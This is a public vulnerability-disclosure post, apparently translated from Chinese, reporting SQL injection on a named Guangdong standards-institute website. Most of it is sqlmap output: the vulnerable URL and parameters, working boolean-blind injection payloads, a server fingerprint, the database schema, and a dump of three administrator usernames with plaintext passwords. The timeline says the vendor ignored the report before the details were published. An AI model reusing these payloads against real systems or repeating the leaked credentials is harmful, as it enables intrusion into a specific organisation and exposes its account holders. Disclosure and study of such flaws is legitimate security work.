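2015-05-06: Details reported to the vendor; awaiting vendor handling.
2015-05-11: The vendor has actively ignored the vulnerability; details disclosed to the public.
SQL injection at the Guangdong Institute of Standardization leads to disclosure of administrator passwords
An ASP site: http://www.gdis.org.cn/label/Lstatute.asp?sign=1&code=ARG001 (GET). With sqlmap I only got two tables out; my dictionary is limited.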
sqlmap identified the following injection points with a total of 80 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9925=9925
---
sqlmap identified the following injection points with a total of 315 HTTP(s) requests:
---
Parameter: code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[2 tables]
+-------+
| ics   |
| usern |
+-------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: usern
[8 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| code     | non-numeric |
| ics      | non-numeric |
| id       | numeric     |
| power    | non-numeric |
| state    | non-numeric |
| tag      | non-numeric |
| username | non-numeric |
| userpwd  | non-numeric |
+----------+-------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: usern
[3 entries]
+----+-----+-----+------+---------------+-------+----------+---------+
| id | tag | ics | code | power | state | username | userpwd |
+----+-----+-----+------+---------------+-------+----------+---------+
| 1 | l艕 | NULL | NULL | |疟~脽{膭t\x06TX | <blank> | admin | admin |
| 7 | l艕 | NULL | NULL | N\x00 | <blank> | sonia | sonia |
| 8 | l艕 | NULL | NULL | N\x00 | <blank> | yegong | 123456 |
+----+-----+-----+------+---------------+-------+----------+---------+
Severity: No impact (ignored by vendor)
Ignored at: 2015-05-11 18:22
None yet